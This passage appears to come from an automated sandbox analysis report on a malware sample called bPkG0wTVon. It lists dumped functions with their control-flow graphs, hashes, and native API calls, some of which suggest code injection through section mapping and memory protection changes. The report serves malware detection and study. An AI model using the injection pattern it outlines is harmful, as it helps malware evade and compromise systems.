                                            control_flow_graph 4825 5df3a2f-5df3a36 4826 5df3a37-5df3a4d 4825->4826 4827 5df44d4-5df44e8 4825->4827 4829 5df3a52-5df3a71 4826->4829 4947 5df3a74 call 4d3dc33 4829->4947 4948 5df3a74 call 4d3dd53 4829->4948 4949 5df3a74 call 4d3da33 4829->4949 4950 5df3a74 call 4d3db33 4829->4950 4951 5df3a74 call 4d3df50 4829->4951 4952 5df3a74 call 4d3dc3b 4829->4952 4953 5df3a74 call 4d3dd1b 4829->4953 4954 5df3a74 call 4d3dafb 4829->4954 4955 5df3a74 call 4d3dcd8 4829->4955 4956 5df3a74 call 4d3dce3 4829->4956 4957 5df3a74 call 4d3ddc3 4829->4957 4958 5df3a74 call 4d3d9e3 4829->4958 4959 5df3a74 call 4d3dba3 4829->4959 4960 5df3a74 call 4d3dd8b 4829->4960 4961 5df3a74 call 4d3df4b 4829->4961 4962 5df3a74 call 4d3daab 4829->4962 4963 5df3a74 call 4d3da2b 4829->4963 4964 5df3a74 call 4d3db6b 4829->4964 4830 5df3a79-5df3ab7 4834 5df3abd-5df3b72 4830->4834 4835 5df3653-5df370a 4830->4835 4834->4827 4843 5df3b78-5df3ba7 4834->4843 4835->4827 4842 5df3710-5df373a 4835->4842 4842->4827 4845 5df3740-5df37ea 4842->4845 4843->4827 4844 5df3bad-5df3c2f 4843->4844 4857 5df37f0-5df3887 4844->4857 4858 5df3c35-5df3cc6 4844->4858 4856 5df3438-5df3555 4845->4856 4845->4857 4856->4827 4876 5df355b-5df35b3 4856->4876 4857->4827 4869 5df388d-5df38aa 4857->4869 4858->4827 4868 5df3ccc-5df3ce9 4858->4868 4868->4827 4871 5df3cef-5df3e16 4868->4871 4869->4827 4872 5df38b0-5df3a08 4869->4872 4871->4827 4896 5df3e1c-5df3e54 4871->4896 4872->4827 4897 5df3a0e-5df3a2d 4872->4897 4876->4827 4877 5df35b9-5df364c 4876->4877 4877->4835 4896->4827 4898 5df3e5a-5df3ef6 4896->4898 4897->4825 4898->4834 4904 5df3efc-5df3f98 4898->4904 4904->4827 4908 5df3f9e-5df3ff0 4904->4908 4908->4827 4909 5df3ff6-5df419e 4908->4909 4909->4827 4918 5df41a4-5df41bd 4909->4918 4918->4827 4919 5df41c3-5df4240 4918->4919 4919->4835 4925 5df4246-5df42ab 4919->4925 4925->4827 4929 5df42b1-5df4300 4925->4929 4929->4827 4930 5df4306-5df437c 4929->4930 4930->4856 4936 5df4382-5df44c8 4930->4936 4936->4834 4946 5df44ce-5df44d3 4936->4946 4947->4830 4948->4830 4949->4830 4950->4830 4951->4830 4952->4830 4953->4830 4954->4830 4955->4830 4956->4830 4957->4830 4958->4830 4959->4830 4960->4830 4961->4830 4962->4830 4963->4830 4964->4830
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ,0$g$;^/$E@_9$QV\1
                                            • API String ID: 0-227804990
                                            • Opcode ID: b2d305125a2fff5a7c355186ea70646215d6cd88d9aa2238e9c18b18089b7ace
                                            • Instruction ID: 3ee8fe8f1dbf1cf9d75b0b28456ea219da90aefc9785670926149b0583c6058f
                                            • Opcode Fuzzy Hash: b2d305125a2fff5a7c355186ea70646215d6cd88d9aa2238e9c18b18089b7ace
                                            • Instruction Fuzzy Hash: 53B2A774E00218AFCB58CFA8C881A9DFBB2BF88314F2485E9D549A7355D735AE91CF50
                                            Function 0825C070 Relevance: 5.6, APIs: 1, Strings: 2, Instructions: 330COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 4965 825c070-825c087 4966 825c08d-825c09f 4965->4966 4967 825c22c-825c267 call 8257dcc 4965->4967 4970 825c0a1-825c0ae 4966->4970 4971 825c0c8-825c0d7 call 825b910 4966->4971 4977 825c26d-825c287 4967->4977 4978 825c359-825c3cf 4967->4978 4970->4967 4973 825c0b4-825c0c5 4970->4973 4976 825c0dc-825c229 4971->4976 4987 825c304-825c316 4977->4987 4988 825c289-825c2a5 call 8257dd8 4977->4988 4989 825c3d1-825c3db 4978->4989 4990 825c408-825c454 LoadLibraryA 4978->4990 4987->4978 4993 825c318-825c338 4987->4993 4988->4978 5000 825c2ab-825c2b7 4988->5000 4989->4990 4994 825c3dd-825c3df 4989->4994 5007 825c456-825c45c 4990->5007 5008 825c45d-825c495 4990->5008 4993->4978 4996 825c33a-825c352 4993->4996 4997 825c3e1-825c3eb 4994->4997 4998 825c402-825c405 4994->4998 4996->4978 5002 825c3ed 4997->5002 5003 825c3ef-825c3fe 4997->5003 4998->4990 5004 825c2be 5000->5004 5005 825c2b9-825c2bc 5000->5005 5002->5003 5003->5003 5009 825c400 5003->5009 5011 825c2c0-825c2d5 5004->5011 5005->5011 5007->5008 5018 825c4a5 5008->5018 5019 825c497-825c49b 5008->5019 5009->4998 5020 825c2d7-825c2da 5011->5020 5021 825c2dc 5011->5021 5025 825c4a6 5018->5025 5019->5018 5022 825c49d 5019->5022 5024 825c2de-825c301 5020->5024 5021->5024 5022->5018 5025->5025
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509033258.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8250000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: Iy2$Iy2
                                            • API String ID: 0-95489057
                                            • Opcode ID: a75981a1a68c8d0f538be9b2595ed2e449c91abadb2aa5e7270854fa4384b229
                                            • Instruction ID: 2fb214fba9f7d3434c9c07ad439c6c796bb3181270c6a62e4b38fcbee27d6f14
                                            • Opcode Fuzzy Hash: a75981a1a68c8d0f538be9b2595ed2e449c91abadb2aa5e7270854fa4384b229
                                            • Instruction Fuzzy Hash: 98C1C371F102188FD714DFA8C894A6DBBE2EF88311F19846ED809EB345DB759C06CB91
                                            Function 082AF49A Relevance: 4.7, Strings: 3, Instructions: 954COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 5595 82af49a-82af49e 5596 82af34f-82af35f 5595->5596 5597 82af49f-82af4b1 5595->5597 5604 82af361-82af368 5596->5604 5598 82af593-82af5a5 5597->5598 5599 82af4b7-82af4dd 5597->5599 5602 82af5a8-82af5c0 5598->5602 5599->5598 5600 82af4e3-82af4e9 5599->5600 5600->5596 5603 82af4ef-82af536 5600->5603 5605 82af93e-82af98b 5602->5605 5606 82af5c6-82af5dc 5602->5606 5607 82af538 5603->5607 5608 82af53e-82af579 5603->5608 5609 82af36a-82af383 5604->5609 5610 82af3ac-82af3b7 5604->5610 5619 82af994-82af9a2 5605->5619 5611 82af5e2-82af678 5606->5611 5612 82afb96-82afbcd 5606->5612 5607->5598 5616 82af53a-82af53c 5607->5616 5617 82af57b 5608->5617 5618 82af585-82af587 5608->5618 5613 82afde2-82afde8 5609->5613 5620 82af389-82af3a1 5609->5620 5610->5609 5615 82af3b9-82af3d7 5610->5615 5637 82af8fe-82af93c 5611->5637 5638 82af67e-82af8f8 5611->5638 5612->5613 5614 82afbd3-82afc23 5612->5614 5614->5613 5622 82afc29-82afc5b 5614->5622 5633 82af3da-82af403 5615->5633 5616->5598 5616->5608 5623 82af589 5617->5623 5624 82af57d-82af583 5617->5624 5625 82af58e-82af591 5618->5625 5626 82af9a5-82af9b6 5619->5626 5620->5633 5622->5613 5628 82afc61-82afc7a 5622->5628 5623->5625 5624->5618 5624->5623 5625->5602 5631 82af9bc-82afacf 5626->5631 5632 82afad2-82afb5c 5626->5632 5628->5613 5635 82afc80-82afd06 5628->5635 5631->5632 5644 82afb88-82afb93 5632->5644 5645 82afb5e-82afb85 5632->5645 5633->5596 5639 82af409-82af416 5633->5639 5635->5613 5660 82afd0c-82afd5c 5635->5660 5637->5626 5638->5637 5642 82af418-82af420 5639->5642 5643 82af422-82af436 5639->5643 5648 82af45d-82af498 5642->5648 5643->5604 5649 82af43c-82af45b 5643->5649 5645->5644 5648->5595 5649->5648 5668 82afd5e-82afd95 5660->5668 5669 82afda0-82afdd7 5660->5669 5668->5669 5669->5613
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509230686.00000000082A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 082A0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_82a0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: *t=z$.2&N$E
                                            • API String ID: 0-3343810366
                                            • Opcode ID: 64a124b177537190026ae303c7ea46a2d312278d09730125a8e6844c3cc0f5a1
                                            • Instruction ID: df5b76272e5deaa70cda3b5cad855dda7f53f1201dccfa9e6cea63eccd953e7a
                                            • Opcode Fuzzy Hash: 64a124b177537190026ae303c7ea46a2d312278d09730125a8e6844c3cc0f5a1
                                            • Instruction Fuzzy Hash: E8524C76E102298FCB24DF68C9906DDB7F2BB88310F1581AAD949EB350DA759D85CF80
                                            Function 05DF60D8 Relevance: 4.4, Strings: 3, Instructions: 657COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 5679 5df60d8-5df60f4 5680 5df60f7-5df6108 5679->5680 5681 5df610e-5df6121 5680->5681 5682 5df688a-5df6890 5680->5682 5687 5df6127-5df6148 5681->5687 5688 5df6832 5681->5688 5685 5df6835-5df6857 5682->5685 5686 5df6892-5df68a7 5682->5686 5705 5df685e-5df6883 5685->5705 5689 5df68a9 5686->5689 5697 5df614a-5df616e 5687->5697 5688->5685 5691 5df68b0-5df6911 5689->5691 5693 5df6917-5df6946 5691->5693 5694 5df6a56-5df6a6e 5691->5694 5693->5694 5704 5df694c-5df6960 5693->5704 5697->5680 5700 5df6170-5df61b7 5697->5700 5700->5682 5703 5df61bd-5df622e 5700->5703 5709 5df625c-5df6265 5703->5709 5710 5df6230-5df6236 5703->5710 5704->5691 5711 5df6966-5df6987 5704->5711 5705->5682 5709->5680 5713 5df626b-5df6273 5709->5713 5710->5680 5712 5df623c-5df6257 5710->5712 5711->5689 5715 5df698d-5df69ad 5711->5715 5738 5df67e6-5df6811 5712->5738 5716 5df62a5-5df62b2 5713->5716 5717 5df6275-5df6279 5713->5717 5715->5689 5720 5df69b3-5df69e9 5715->5720 5716->5680 5721 5df62b8-5df62c6 5716->5721 5718 5df628f 5717->5718 5719 5df627b-5df6284 5717->5719 5725 5df6292-5df62a0 5718->5725 5723 5df628b 5719->5723 5724 5df6286-5df6289 5719->5724 5720->5691 5727 5df69ef-5df6a04 5720->5727 5728 5df6338-5df634d 5721->5728 5729 5df62c8-5df62d5 5721->5729 5730 5df628d 5723->5730 5724->5730 5725->5738 5727->5694 5731 5df6a06-5df6a34 5727->5731 5728->5688 5732 5df6353-5df6374 5728->5732 5733 5df62eb 5729->5733 5734 5df62d7-5df62e9 5729->5734 5730->5725 5731->5691 5754 5df6a3a-5df6a55 5731->5754 5737 5df637a-5df6384 5732->5737 5732->5738 5739 5df62ee-5df6302 5733->5739 5734->5739 5741 5df6386-5df639b 5737->5741 5742 5df63a0-5df63a6 5737->5742 5806 5df6814 call 5df6ad8 5738->5806 5807 5df6814 call 5df6ac8 5738->5807 5739->5687 5746 5df6308-5df630c 5739->5746 5741->5738 5742->5688 5744 5df63ac-5df63b6 5742->5744 5743 5df681a-5df682f 5748 5df63cc 5744->5748 5749 5df63b8-5df63ca 5744->5749 5751 5df630e-5df6317 5746->5751 5752 5df6322 5746->5752 5750 5df63cf-5df63d9 5748->5750 5749->5750 5750->5697 5755 5df63df-5df6406 5750->5755 5756 5df631e 5751->5756 5757 5df6319-5df631c 5751->5757 5758 5df6325-5df6333 5752->5758 5755->5682 5760 5df640c-5df641d 5755->5760 5761 5df6320 5756->5761 5757->5761 5758->5738 5764 5df641f-5df6425 5760->5764 5765 5df6430-5df6439 5760->5765 5761->5758 5764->5705 5766 5df642b 5764->5766 5765->5680 5767 5df643f-5df644c 5765->5767 5766->5700 5768 5df6665-5df667b 5767->5768 5769 5df6452-5df6473 5767->5769 5770 5df678e-5df67aa 5768->5770 5771 5df6681-5df669e 5768->5771 5769->5770 5772 5df6479-5df64a7 5769->5772 5770->5682 5783 5df67b0-5df67df 5770->5783 5776 5df6708-5df6761 5771->5776 5777 5df66a0 5771->5777 5772->5770 5778 5df64ad-5df64f6 5772->5778 5776->5770 5781 5df6763-5df6786 5776->5781 5780 5df66a6-5df66b2 5777->5780 5787 5df64fc-5df6512 5778->5787 5788 5df662a-5df6646 5778->5788 5784 5df658f-5df65a5 5780->5784 5785 5df66b8-5df66ce 5780->5785 5781->5769 5798 5df678c 5781->5798 5783->5738 5784->5770 5789 5df65ab-5df65fa 5784->5789 5785->5770 5790 5df66d4-5df6702 5785->5790 5787->5770 5792 5df6518-5df6556 5787->5792 5788->5770 5791 5df664c-5df6663 5788->5791 5789->5770 5800 5df6600-5df6628 5789->5800 5790->5776 5791->5768 5791->5780 5792->5770 5802 5df655c-5df6589 5792->5802 5798->5738 5800->5788 5802->5769 5802->5784 5806->5743 5807->5743
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: c7^$XX}q$$}q
                                            • API String ID: 0-2761388198
                                            • Opcode ID: 3a45a83150d1f821d0dc6c1cbc35564f33c8cd964c39c026ae44cb6c498cd35a
                                            • Instruction ID: 51ee479a4e8c425cfdec43f780952b4320ce3a4d7bb8fba955a230a476d762fa
                                            • Opcode Fuzzy Hash: 3a45a83150d1f821d0dc6c1cbc35564f33c8cd964c39c026ae44cb6c498cd35a
                                            • Instruction Fuzzy Hash: 4742BE35B002059FCB18DFA8D8D09A9B7F2FF88304B56C56AD9099B745DB71ED4ACB80
                                            Function 05DF076F Relevance: 4.3, Strings: 3, Instructions: 573COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: 2%%$PH}q$$}q
                                            • API String ID: 0-1129934225
                                            • Opcode ID: f333251bc5c716902cf8b8d109ab697edfa34b9eb258e52a27a6bc5f010a3690
                                            • Instruction ID: b538a1b2cbf0bc770872977753619e6425dd83ce5f58fc47e0fd307693d04284
                                            • Opcode Fuzzy Hash: f333251bc5c716902cf8b8d109ab697edfa34b9eb258e52a27a6bc5f010a3690
                                            • Instruction Fuzzy Hash: A622A135B001159FC714DB68C994A6AF7E2FF88314B1AC56AD90AEB346DB71EC42CBD0
                                            Function 08257F78 Relevance: 4.3, Strings: 2, Instructions: 1777COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1509033258.0000000008250000.00000040.00000800.00020000.00000000.sdmp, Offset: 08250000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_8250000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ?^.L$PH}q
                                            • API String ID: 0-2355326592
                                            • Opcode ID: a3f8f27c828669867692171310d229ddb8fbc8f57811e54d3e6da8f9832edab2
                                            • Instruction ID: 7de77fe99871ce6fea7ad9036aa7c07c1e13d6f8242672410f4fad89c427adea
                                            • Opcode Fuzzy Hash: a3f8f27c828669867692171310d229ddb8fbc8f57811e54d3e6da8f9832edab2
                                            • Instruction Fuzzy Hash: 9DF25D75E102258FC754DF68D894A99FBB2BF88310F1585AAD809EB341DB71ED86CF80
                                            Function 05DFB570 Relevance: 3.9, Strings: 2, Instructions: 1444COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: ?)(g$PH}q
                                            • API String ID: 0-609040070
                                            • Opcode ID: b79c19146f66a982089bf25c374e273dbed18496bcf5a910c3878dfa753375bc
                                            • Instruction ID: bec74c9775071df0a0e78abfef1bc4e20bdd1ee2595494a2e5f2e54f24326d4f
                                            • Opcode Fuzzy Hash: b79c19146f66a982089bf25c374e273dbed18496bcf5a910c3878dfa753375bc
                                            • Instruction Fuzzy Hash: 43C2C471F142298FD714DF68C890AAAB7E7AF88300F1585AAD80AE7355DB34AD45CFD0
                                            Function 05DFF0D0 Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 260COMMON
                                            Download Yara Rule

                                            Control-flow Graph

                                            • Executed
                                            • Not Executed
                                            control_flow_graph 6815 5dff0d0-5dff0e9 6816 5dff0ec-5dff0fb call 5dfeccc 6815->6816 6819 5dff100-5dff14b 6816->6819 6819->6819 6820 5dff14d-5dff17f 6819->6820 6821 5dff396-5dff41f CreateToolhelp32Snapshot 6820->6821 6822 5dff185-5dff191 6820->6822 6831 5dff428-5dff43c 6821->6831 6832 5dff421-5dff427 6821->6832 6822->6821 6823 5dff197-5dff1cb 6822->6823 6823->6816 6833 5dff1d1-5dff1ef call 5dfecd8 6823->6833 6832->6831 6837 5dff31a-5dff328 6833->6837 6838 5dff1f5-5dff215 6833->6838 6837->6816 6839 5dff32e-5dff36a call 5dfecf0 6837->6839 6838->6816 6840 5dff21b-5dff241 6838->6840 6839->6821 6845 5dff36c-5dff386 6839->6845 6841 5dff2c3-5dff2d4 6840->6841 6841->6820 6844 5dff2da-5dff2e3 6841->6844 6846 5dff2e9 6844->6846 6847 5dff246-5dff24e 6844->6847 6845->6819 6853 5dff38c-5dff393 6845->6853 6849 5dff2ef-5dff2f5 6846->6849 6847->6821 6848 5dff254-5dff264 6847->6848 6848->6816 6850 5dff26a-5dff28e 6848->6850 6849->6816 6852 5dff2fb-5dff30d call 5dfece4 6849->6852 6857 5dff2b0-5dff2bd 6850->6857 6858 5dff290-5dff2a8 6850->6858 6855 5dff312-5dff314 6852->6855 6855->6837 6855->6838 6857->6841 6858->6816 6860 5dff2ae 6858->6860 6860->6849
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: CreateSnapshotToolhelp32
                                            • String ID: Iy2
                                            • API String ID: 3332741929-1648239622
                                            • Opcode ID: 3de663a4cd5956f12adb0485d8155f1ccb7f3c213c00abe21e5ff84769219b5c
                                            • Instruction ID: af9c530cea2fad885acf2bce941c187f4fd09daaee72990f7d2ec0695b2aa00c
                                            • Opcode Fuzzy Hash: 3de663a4cd5956f12adb0485d8155f1ccb7f3c213c00abe21e5ff84769219b5c
                                            • Instruction Fuzzy Hash: BE91B236E0022A9BCB14CF69C88069EF7F6BF88310B1AC56AD915E7354DB70AC45CBD0
                                            Function 05DFDCA0 Relevance: 3.6, Strings: 2, Instructions: 1105COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $t5g$C
                                            • API String ID: 0-3053290550
                                            • Opcode ID: 486caa88dffd6a505954a871bccd127df255746b9377ab64af74de64bd198374
                                            • Instruction ID: 7a50f3e39b539c9506b78e4e9e77c84b24b726b84953a281b31e9d1bf05efeee
                                            • Opcode Fuzzy Hash: 486caa88dffd6a505954a871bccd127df255746b9377ab64af74de64bd198374
                                            • Instruction Fuzzy Hash: 4082B272F001284BDB58DB7888906AEB7E7AF98700F05856ED84EF7344DA789D458FD1
                                            Function 05DFDC90 Relevance: 3.6, Strings: 2, Instructions: 1101COMMON
                                            Download Yara Rule
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1504939245.0000000005DF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05DF0000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_5df0000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID:
                                            • String ID: $t5g$C
                                            • API String ID: 0-3053290550
                                            • Opcode ID: c27be5aed3f57d506898f94ff8abab8d1ea9706c19ac59e1d25ed1600ec51891
                                            • Instruction ID: 5e6e6e6ed3a1984c1b7b97b6b41bb79c4adca31203afbf04bfe94708ed676a84
                                            • Opcode Fuzzy Hash: c27be5aed3f57d506898f94ff8abab8d1ea9706c19ac59e1d25ed1600ec51891
                                            • Instruction Fuzzy Hash: F482B172F101284BDB58DBB888906AEB7E7AF98700F05856ED80EF7344DA789D458FD1
                                            Function 04D349B8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 72nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 04D34A5E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: SectionView
                                            • String ID: Iy2
                                            • API String ID: 1323581903-1648239622
                                            • Opcode ID: 369dea5d2d06fb1d23b3fbb7dbed02db4f70e6d9d63e3b7ba80927eed6144f15
                                            • Instruction ID: 3a613679d8c2f35db1311cd7fe13c271fc8fc63070d5452afb592255336dab49
                                            • Opcode Fuzzy Hash: 369dea5d2d06fb1d23b3fbb7dbed02db4f70e6d9d63e3b7ba80927eed6144f15
                                            • Instruction Fuzzy Hash: B431D175900209AFDF11DFAAD984ADEBFF5FF48324F14841AE919A7210C739A950CFA4
                                            Function 04D349C0 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 70nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtMapViewOfSection.NTDLL(?,?,00000000,?,?,?,?,?,?,?,?), ref: 04D34A5E
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: SectionView
                                            • String ID: Iy2
                                            • API String ID: 1323581903-1648239622
                                            • Opcode ID: f44dffc6fa8cc21cba589f705ae61496e2df452a3d8eb451bff3c7398ecb32bf
                                            • Instruction ID: 2cd32560991dccfaf011f1f9b0580774435e4dd77373a02660b72d9c610abb3d
                                            • Opcode Fuzzy Hash: f44dffc6fa8cc21cba589f705ae61496e2df452a3d8eb451bff3c7398ecb32bf
                                            • Instruction Fuzzy Hash: F531D175900208AFCF11DFAAD884ADEBFF5BF48324F14841AE919A3210C739A950CFA4
                                            Function 04D34810 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 66nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 04D348A4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: CreateSection
                                            • String ID: Iy2
                                            • API String ID: 2449625523-1648239622
                                            • Opcode ID: 0416e8171a0b433117e92a8af809103f9f69d7def7cdd0ffc6f7629b601e0730
                                            • Instruction ID: ccb13527e50daf317a0b03537f540bfaf7a5a6aef0538da1af61873979437ef0
                                            • Opcode Fuzzy Hash: 0416e8171a0b433117e92a8af809103f9f69d7def7cdd0ffc6f7629b601e0730
                                            • Instruction Fuzzy Hash: CD21F5B1D01259AFDB01DFAAD980ADEFFB5FF58310F50841AE918A7200C7799951CFA0
                                            Function 04D34318 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 04D343A9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: MemoryProtectVirtual
                                            • String ID: Iy2
                                            • API String ID: 2706961497-1648239622
                                            • Opcode ID: f2becdfb18985b7135b950084247488c2616f47749b07a2e7a5fdc40863e1e6f
                                            • Instruction ID: 729acddce14410f7403dc6a66bb4fd794ed877bc58d10b22cf3d98a267350eb0
                                            • Opcode Fuzzy Hash: f2becdfb18985b7135b950084247488c2616f47749b07a2e7a5fdc40863e1e6f
                                            • Instruction Fuzzy Hash: F821F2B5D003499FCB10DFAAD984ADEFBF5FF48310F24842AE519A7240C779A900CBA5
                                            Function 04D34818 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtCreateSection.NTDLL(?,?,?,?,?,?,?), ref: 04D348A4
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: CreateSection
                                            • String ID: Iy2
                                            • API String ID: 2449625523-1648239622
                                            • Opcode ID: e63e225c6b004a28f7f253258bd7577d65e4f86bd393755003718bcf3ef8496d
                                            • Instruction ID: df6484cd5c16eadc50fadcb9177de4cbd3a0a2169596ca7bf39018de16d8b0c4
                                            • Opcode Fuzzy Hash: e63e225c6b004a28f7f253258bd7577d65e4f86bd393755003718bcf3ef8496d
                                            • Instruction Fuzzy Hash: 4D21F4B1D01259AFDB00DFAAD980ADEFBB5FF48310F10842AE918A7200C7799950CBA0
                                            Function 04D34B70 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 64filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtDeviceIoControlFile.NTDLL(?,?,?,?,00000000,?,?,?,?,?), ref: 04D34BFE
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: ControlDeviceFile
                                            • String ID: Iy2
                                            • API String ID: 3512290074-1648239622
                                            • Opcode ID: 48c52ae0cfbc7bef1ca0feca269f5b2f7860d4861da18bfb19ea4b2d4f9364e6
                                            • Instruction ID: ef1d4039d4842e830a45d013fcd7ce3026ca5366dee0c67f47e49249519e8519
                                            • Opcode Fuzzy Hash: 48c52ae0cfbc7bef1ca0feca269f5b2f7860d4861da18bfb19ea4b2d4f9364e6
                                            • Instruction Fuzzy Hash: 1C2123728002099FCF11CFAAD840ADEBBF5BF48324F148419E919B7210C739A951CFA0
                                            Function 04D34740 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63filenativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtOpenFile.NTDLL(?,?,?,?,?,?), ref: 04D347C9
                                            Strings
                                            Memory Dump Source
                                            • Source File: 00000000.00000002.1502501634.0000000004D30000.00000040.00000800.00020000.00000000.sdmp, Offset: 04D30000, based on PE: false
                                            Joe Sandbox IDA Plugin
                                            • Snapshot File: hcaresult_0_2_4d30000_bPkG0wTVon.jbxd
                                            Similarity
                                            • API ID: FileOpen
                                            • String ID: Iy2
                                            • API String ID: 2669468079-1648239622
                                            • Opcode ID: 17c9c4a3e2d28a12c4c7dcebbcf2c686dd0bc50d0386963e523874a1a208432f
                                            • Instruction ID: 5e7abea1abfb2e6e239bef1f929cd17fe6d41ab3cab17ac0818f1191f5d656e9
                                            • Opcode Fuzzy Hash: 17c9c4a3e2d28a12c4c7dcebbcf2c686dd0bc50d0386963e523874a1a208432f
                                            • Instruction Fuzzy Hash: 342114B5D01219AFCB00CFAAD984ADEFBB4FF48310F50842AE518B7200C779A914CBE0
                                            Function 04D34320 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 63nativeCOMMON
                                            Download Yara Rule
                                            APIs
                                            • NtProtectVirtualMemory.NTDLL(?,?,?,?,?), ref: 04D343A9
                                            Strings
                                            Memory Dump Source
